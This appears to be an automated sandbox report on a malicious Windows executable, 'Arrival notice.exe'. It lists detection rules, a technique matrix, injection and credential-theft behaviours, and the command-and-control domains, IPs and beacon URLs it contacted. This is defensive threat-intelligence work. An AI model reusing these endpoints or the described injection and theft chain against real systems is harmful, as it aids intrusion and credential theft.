            Source: Yara matchFile source: 0000000C.00000002.3747714326.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1730283884.0000000008C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3746700176.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1725426506.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3750353258.0000000003960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		312
            Process Injection            		2
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		312
            Process Injection            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Abuse Elevation Control Mechanism            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
            Obfuscated Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials12
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527837 Sample: Arrival notice.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 31 www.moritynomxd.xyz 2->31 33 www.kilbmn.xyz 2->33 35 19 other IPs or domains 2->35 39 Multi AV Scanner detection for domain / URL 2->39 41 Suricata IDS alerts for network traffic 2->41 43 Malicious sample detected (through community Yara rule) 2->43 47 6 other signatures 2->47 10 Arrival notice.exe 1 2->10         started        signatures3 45 Performs DNS queries to domains with low reputation 33->45 process4 signatures5 57 Writes to foreign memory regions 10->57 59 Maps a DLL or memory area into another process 10->59 13 svchost.exe 10->13         started        process6 signatures7 61 Maps a DLL or memory area into another process 13->61 16 JGgOTaRBeKg.exe 13->16 injected process8 dnsIp9 25 www.kilbmn.xyz 162.0.238.246, 49981, 49982, 49983 NAMECHEAP-NETUS Canada 16->25 27 animekuid.xyz 203.175.9.128, 50001, 50002, 50003 FCCDCI-NET-PH4FPodiumRCBCPlazaTowerIPH Indonesia 16->27 29 9 other IPs or domains 16->29 37 Found direct / indirect Syscall (likely to bypass EDR) 16->37 20 mobsync.exe 13 16->20         started        signatures10 process11 signatures12 49 Tries to steal Mail credentials (via file / registry access) 20->49 51 Tries to harvest and steal browser information (history, passwords, etc) 20->51 53 Modifies the context of a thread in another process (thread injection) 20->53 55 2 other signatures 20->55 23 firefox.exe 20->23         started        process13

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Arrival notice.exe55%ReversingLabsWin32.Trojan.Autoitinject
            Arrival notice.exe45%VirustotalBrowse
            Arrival notice.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.kilbmn.xyz1%VirustotalBrowse
            galaxyslot88rtp.lat0%VirustotalBrowse
            www.federall.store1%VirustotalBrowse
            chalet-tofane.net8%VirustotalBrowse
            030002304.xyz3%VirustotalBrowse
            wearenotgoingback.info3%VirustotalBrowse
            platinumkitchens.info9%VirustotalBrowse
            animekuid.xyz3%VirustotalBrowse
            nng65.top1%VirustotalBrowse
            www.wearenotgoingback.info0%VirustotalBrowse
            www.animekuid.xyz3%VirustotalBrowse
            www.galaxyslot88rtp.lat0%VirustotalBrowse
            www.platinumkitchens.info0%VirustotalBrowse
            www.chalet-tofane.net2%VirustotalBrowse
            www.nng65.top1%VirustotalBrowse
            www.mivasectomy.net1%VirustotalBrowse
            www.030002304.xyz3%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://www.reg.ru/whois/?check=&dname=www.albero-dveri.online&amp;reg_source=parking_auto0%VirustotalBrowse
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
            https://reg.ru0%VirustotalBrowse
            http://www.moritynomxd.xyz/vjif/1%VirustotalBrowse
            http://www.chalet-tofane.net/vv4m/7%VirustotalBrowse
            http://www.galaxyslot88rtp.lat/zkan/1%VirustotalBrowse
            https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-0%VirustotalBrowse
            http://www.platinumkitchens.info/nkwh/6%VirustotalBrowse
            http://www.kilbmn.xyz/a8og/1%VirustotalBrowse
            http://www.animekuid.xyz/ztx6/3%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.kilbmn.xyz
            		162.0.238.246
            		truetrueunknown
            mivasectomy.net
            		3.33.130.190
            		truetrue
              		unknown
              www.albero-dveri.online
              		194.58.112.174
              		truetrue
                		unknown
                galaxyslot88rtp.lat
                		46.17.172.49
                		truetrueunknown
                www.federall.store
                		45.130.41.13
                		truetrueunknown
                chalet-tofane.net
                		62.149.128.40
                		truetrueunknown
                030002304.xyz
                		65.21.196.90
                		truetrueunknown
                wearenotgoingback.info
                		76.223.105.230
                		truetrueunknown
                platinumkitchens.info
                		3.33.130.190
                		truetrueunknown
                animekuid.xyz
                		203.175.9.128
                		truetrueunknown
                www.moritynomxd.xyz
                		172.81.61.224
                		truetrue
                  		unknown
                  nng65.top
                  		38.47.233.65
                  		truetrueunknown
                  www.wearenotgoingback.info
                  		unknown
                  		unknowntrueunknown
                  www.kfowks.site
                  		unknown
                  		unknowntrue
                    		unknown
                    www.030002304.xyz
                    		unknown
                    		unknowntrueunknown
                    www.animekuid.xyz
                    		unknown
                    		unknowntrueunknown
                    www.galaxyslot88rtp.lat
                    		unknown
                    		unknowntrueunknown
                    www.platinumkitchens.info
                    		unknown
                    		unknowntrueunknown
                    www.mivasectomy.net
                    		unknown
                    		unknowntrueunknown
                    www.nng65.top
                    		unknown
                    		unknowntrueunknown
                    www.chalet-tofane.net
                    		unknown
                    		unknowntrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.wearenotgoingback.info/cjvv/?EZ2lo=4S8XY8l3MvvMOMyL3KrDz8kPPAGqnGng5tYYPWDdvWcwX33CgHNrDDjfFme/uWZ2yYnPkPJRTtnUR7GmwOpWBkY/43NiHjgDg3aX97mZZ8znKIfN0Q==&7NP=7FXXUPltrue
                      		unknown
                      http://www.030002304.xyz/u38h/?EZ2lo=iaxEuHPh9M0PkCehiVmYq99vb8GYcF42nF8/pgvOtFqWiDn4lMrJ/WO5nlbDSyDBFBFfwqZzhOOdUgIoiT3LOtzwEygyB6NUSlIKo/1Br+QrM4rsiQ==&7NP=7FXXUPltrue
                        		unknown
                        http://www.moritynomxd.xyz/vjif/trueunknown
                        http://www.albero-dveri.online/1yii/?EZ2lo=S7820Y1cJZfxr22K40lVRI+qrmhalVt3Xj4gyHqd7MQTNmhmHaxoWGfNrnng7EIbxAFiJvsMf3T0ofXi1SEumpqeoP3XzrB7Dn3j9lk1UX6QYnk/Rw==&7NP=7FXXUPltrue
                          		unknown
                          http://www.platinumkitchens.info/nkwh/trueunknown
                          http://www.chalet-tofane.net/vv4m/trueunknown
                          http://www.galaxyslot88rtp.lat/zkan/trueunknown
                          http://www.animekuid.xyz/ztx6/trueunknown
                          http://www.kilbmn.xyz/a8og/trueunknown
                          http://www.030002304.xyz/u38h/true
                            		unknown
                            http://www.galaxyslot88rtp.lat/zkan/?EZ2lo=6ZAT3xIn5pUb7db/tro8oHOZJyMtHS049C+OqD69Fiv/T4rqyATbhBxWGTJ8nzJFC6ZuCLeYMeRBfErXdr+6Npf/MiZpvdt0v4GFRoEaqN4q8s+9XQ==&7NP=7FXXUPltrue
                              		unknown
                              http://www.albero-dveri.online/1yii/true
                                		unknown
                                http://www.moritynomxd.xyz/vjif/?7NP=7FXXUPl&EZ2lo=hht6fXzVtrW5d+NPng+JG5iJCe7TavNe5+XwDzPis3heMTZrctTYWOKh4nmo+xDjprJSB+HPmC1WRNqnme2dwnVwPjNhKroV7fgYGIXE7NS2qGE/9Q==true
                                  		unknown
                                  http://www.federall.store/avd1/true
                                    		unknown
                                    http://www.nng65.top/kpvx/true
                                      		unknown
                                      http://www.federall.store/avd1/?EZ2lo=NeMCgL3W9jbBcF5QBI+xC2/C0rmOR2XSlRqEEw8EMM6ZBEMSksCLPJavXevPRkfiV5XKnMhO9JLxspMiSypcmF8IFrr+/UGmTQZVyy/nwgawwG6yzQ==&7NP=7FXXUPltrue
                                        		unknown
                                        http://www.kilbmn.xyz/a8og/?EZ2lo=63Tp62CKGmWe748Q5xeLHwHqlS9/zq85FZX5ThSUZXnn1SRB3dZnoH27TzC6blggGQlMUKSAP7YLOcUQh9GTRQVuzTmijcvuIWv8RUIdN7d1j+xO0w==&7NP=7FXXUPltrue
                                          		unknown
                                          http://www.mivasectomy.net/gbk4/true
                                            		unknown
                                            http://www.animekuid.xyz/ztx6/?7NP=7FXXUPl&EZ2lo=LeaXBPgHi5cWzf7BLXmmPavQOKPWjuOHHJU4/JhL5/erYoJhFK0RVrM4N1v7oJ6CU0UsWYV2IqVksZKiICMv/g8AZCcinNpV5w5CDvgP9QHPdQNWgQ==true
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabmobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.reg.ru/whois/?check=&dname=www.albero-dveri.online&amp;reg_source=parking_autoJGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpfalseunknown
                                              https://www.reg.ru/web-sites/website-builder/?utm_source=www.albero-dveri.online&utm_medium=parking&JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                		unknown
                                                https://duckduckgo.com/ac/?q=mobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://reg.ruJGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpfalseunknown
                                                https://www.reg.ru/domain/new/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  		unknown
                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icomobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.reg.ru/hosting/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_lanJGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    		unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=mobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpfalseunknown
                                                    https://www.ecosia.org/newtab/mobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.reg.ru/web-sites/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_lJGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                      		unknown
                                                      https://ac.ecosia.org/autocomplete?q=mobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://parking.reg.ru/script/get_domain_data?domain_name=www.albero-dveri.online&rand=JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                        		unknown
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.chalet-tofane.net:80/vv4m/?7NP=7FXXUPl&amp;EZ2lo=YHtjADYkxu7EjL2CugAOyFkdJGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000772C000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.0000000005A4C000.00000004.10000000.00040000.00000000.sdmptrue
                                                          		unknown
                                                          https://wearenotgoingback.info/cjvv/?EZ2lo=4S8XY8l3MvvMOMyL3KrDz8kPPAGqnGng5tYYPWDdvWcwX33CgHNrDDjfFJGgOTaRBeKg.exe, 0000000B.00000002.3756739747.00000000070E4000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.0000000005404000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2024715906.000000003FBA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                            		unknown
                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=mobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://www.reg.ru/dedicated/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_lJGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                              		unknown
                                                              http://animekuid.xyz/ztx6/?7NP=7FXXUPl&EZ2lo=LeaXBPgHi5cWzf7BLXmmPavQOKPWjuOHHJU4/JhL5/erYoJhFK0RVrMJGgOTaRBeKg.exe, 0000000B.00000002.3756739747.0000000007D74000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.0000000006094000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                		unknown
                                                                http://www.albero-dveri.onlineJGgOTaRBeKg.exe, 0000000B.00000002.3758373668.00000000091AE000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                  		unknown

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  162.0.238.246
                                                                  		www.kilbmn.xyzCanada
                                                                  		22612NAMECHEAP-NETUStrue
                                                                  62.149.128.40
                                                                  		chalet-tofane.netItaly
                                                                  		31034ARUBA-ASNITtrue
                                                                  38.47.233.65
                                                                  		nng65.topUnited States
                                                                  		174COGENT-174UStrue
                                                                  65.21.196.90
                                                                  		030002304.xyzUnited States
                                                                  		199592CP-ASDEtrue
                                                                  45.130.41.13
                                                                  		www.federall.storeRussian Federation
                                                                  		198610BEGET-ASRUtrue
                                                                  76.223.105.230
                                                                  		wearenotgoingback.infoUnited States
                                                                  		16509AMAZON-02UStrue
                                                                  46.17.172.49
                                                                  		galaxyslot88rtp.latGermany
                                                                  		47583AS-HOSTINGERLTtrue
                                                                  194.58.112.174
                                                                  		www.albero-dveri.onlineRussian Federation
                                                                  		197695AS-REGRUtrue
                                                                  3.33.130.190
                                                                  		mivasectomy.netUnited States
                                                                  		8987AMAZONEXPANSIONGBtrue
                                                                  203.175.9.128
                                                                  		animekuid.xyzIndonesia
                                                                  		131303FCCDCI-NET-PH4FPodiumRCBCPlazaTowerIPHtrue
                                                                  172.81.61.224
                                                                  		www.moritynomxd.xyzUnited States
                                                                  		22552ESITEDUStrue

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1527837
                                                                  Start date and time:2024-10-07 10:36:34 +02:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 10m 9s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:18
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:1
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:Arrival notice.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/2@16/11
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 86%
                                                                  • Number of executed functions: 55
                                                                  • Number of non-executed functions: 313
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  04:38:47API Interceptor8972270x Sleep call for process: mobsync.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  162.0.238.246DHL_ 46773482.exeGet hashmaliciousFormBookBrowse
                                                                  • www.buyiop.online/r6mm/
                                                                  z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                  • www.huyven.xyz/dbbh/
                                                                  Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                                  • www.mistsui.top/r48b/
                                                                  RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                  • www.quantis.life/hczh/
                                                                  LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                                  • www.inchey.online/ercr/
                                                                  62.149.128.40SHIPPING_DOCUMENTS.VBS.vbsGet hashmaliciousFormBookBrowse
                                                                  • www.chalet-tofane.net/obbp/
                                                                  List of Items0001.doc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.chalet-tofane.net/ytc6/
                                                                  Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                                  • www.chalet-tofane.net/uesf/
                                                                  PO76389.exeGet hashmaliciousFormBookBrowse
                                                                  • www.fimgroup.net/f3w9/
                                                                  bintoday1.exeGet hashmaliciousFormBookBrowse
                                                                  • www.fimgroup.net/m3ft/
                                                                  Atlas Copco- WEPCO.exeGet hashmaliciousFormBookBrowse
                                                                  • www.fimgroup.net/fqzh/
                                                                  file No83293 PO & Specification.gz.exeGet hashmaliciousFormBookBrowse
                                                                  • www.pyrlist-test.cloud/apau/?32gdi4=omLpuGVmsyOHdGpRdjgRwIdS8onMLPtYZwnQxrZ2pdkklfz3vB2UBDvQaSU1YR7Xr6uYdwMb/adcCe42hD+vmDiudnADMik3xc+FpjXk83bBo7qDRClwT378wlWS9dAj4UFWXQx8lPSh&wLAt=m8MLyLih-H4lf
                                                                  64MXEd79F1.exeGet hashmaliciousFormBookBrowse
                                                                  • www.autoreediritto.com/aucq/?pZXDmpb8=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqXenXGQFHAUL+cMNE98AcgW9WHO0Ixf81xDLisHhibZAVvCGoKVw=&fv=tdYXXJI8Drl4
                                                                  09090.exeGet hashmaliciousFormBookBrowse
                                                                  • www.autoreediritto.com/aucq/?zFQHE=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqXenXGQFHAUL+cMNE98AcgW9WHO0Ixf81xDLisHhibZAVvCGoKVw=&yF3=b0i4Y00xHtf
                                                                  8bwKawHg0Z.exeGet hashmaliciousFormBookBrowse
                                                                  • www.autoreediritto.com/aucq/?m4kp=Q04lO4tHCdMhGRPp&Z2n4kTEh=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqUenkRjtIRRn+PcJ+980YglFIHv1RxaMTu2bilHhQR8NY0g==
                                                                  38.47.233.65DHL_ 46773482.exeGet hashmaliciousFormBookBrowse
                                                                  • www.nng65.top/0xnc/
                                                                  RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                  • www.nng65.top/h709/
                                                                  k8FSEGGo4d9blGr.exeGet hashmaliciousFormBookBrowse
                                                                  • www.qqa84.top/2n7s/
                                                                  September Order.exeGet hashmaliciousFormBookBrowse
                                                                  • www.nng65.top/7bwx/
                                                                  PO#86637.exeGet hashmaliciousFormBookBrowse
                                                                  • www.qqa84.top/2qp8/
                                                                  Quote #011698.exeGet hashmaliciousFormBookBrowse
                                                                  • www.qqa84.top/2qp8/
                                                                  yyyyyyyy.exeGet hashmaliciousFormBookBrowse
                                                                  • www.qqa84.top/yqrp/?EN-hu=3JBOC3Zinj9Q/QZ6nj2TBhVj6Qn2+UGmQB+gM3/kJK89ew2X04ZwSyucTT/Zg+CsqlXbhWc2C9lKXgVjyjN7XR24mfkQEmyM89v3vAFGTWijfWrLOg==&zx=TzUh
                                                                  PO#86637.exeGet hashmaliciousFormBookBrowse
                                                                  • www.qqa84.top/2qp8/
                                                                  PO#86637.exeGet hashmaliciousFormBookBrowse
                                                                  • www.qqa84.top/2qp8/
                                                                  PI 30_08_2024.exeGet hashmaliciousFormBookBrowse
                                                                  • www.qqa84.top/2qp8/

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  www.albero-dveri.online-pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                  • 194.58.112.174
                                                                  UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 194.58.112.174
                                                                  AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                                                  • 194.58.112.174
                                                                  RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                  • 194.58.112.174
                                                                  ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                  • 194.58.112.174
                                                                  September Order.exeGet hashmaliciousFormBookBrowse
                                                                  • 194.58.112.174
                                                                  www.federall.storeBL Draft-Invoice-Packing list-Shipping Document.pif.exeGet hashmaliciousFormBookBrowse
                                                                  • 45.130.41.13

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  CP-ASDEhttps://jumatan.sudaha.biz.id/4F741t%23XjCw%5BYg/Get hashmaliciousUnknownBrowse
                                                                  • 65.21.235.194
                                                                  rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 65.21.196.90
                                                                  https://www.elightsailorsbank.uksfholdings.com/Get hashmaliciousUnknownBrowse
                                                                  • 65.21.85.206
                                                                  044f.pdf.scrGet hashmaliciousRMSRemoteAdminBrowse
                                                                  • 65.21.245.7
                                                                  Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                  • 65.21.196.90
                                                                  P030092024LANDWAY.exeGet hashmaliciousFormBookBrowse
                                                                  • 65.21.196.90
                                                                  https://quatangff-garena.pw.io.vn/Get hashmaliciousHTMLPhisherBrowse
                                                                  • 65.21.235.194
                                                                  file.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                                                  • 65.21.18.51
                                                                  Quote #260924.exeGet hashmaliciousFormBookBrowse
                                                                  • 65.21.196.90
                                                                  https://claim.eventsmidasbuys.com/Get hashmaliciousHTMLPhisherBrowse
                                                                  • 65.21.235.194
                                                                  NAMECHEAP-NETUShttp://buddycities.com/Get hashmaliciousUnknownBrowse
                                                                  • 162.255.119.35
                                                                  http://buckboosters.com/Get hashmaliciousUnknownBrowse
                                                                  • 192.64.119.229
                                                                  http://vpnpanda.org/Get hashmaliciousUnknownBrowse
                                                                  • 162.255.119.66
                                                                  172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeGet hashmaliciousSmokeLoaderBrowse
                                                                  • 198.54.117.242
                                                                  http://nirothniroth.site/?p=22&fbclid=IwY2xjawFs_DdleHRuA2FlbQIxMQABHTdgZU6ok722L5RxKPR-zh7Gkm6BqZ8BcT950y1bxf6l0LKz0zslg7KJHw_aem__ldVm1UUndXAkwYRakjBzgGet hashmaliciousUnknownBrowse
                                                                  • 63.250.43.7
                                                                  http://reportrix.co.uk/assets/assetfile/js/main.jsGet hashmaliciousUnknownBrowse
                                                                  • 104.219.248.24
                                                                  presupuesto urgente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 199.192.19.19
                                                                  1.cmdGet hashmaliciousUnknownBrowse
                                                                  • 192.64.119.55
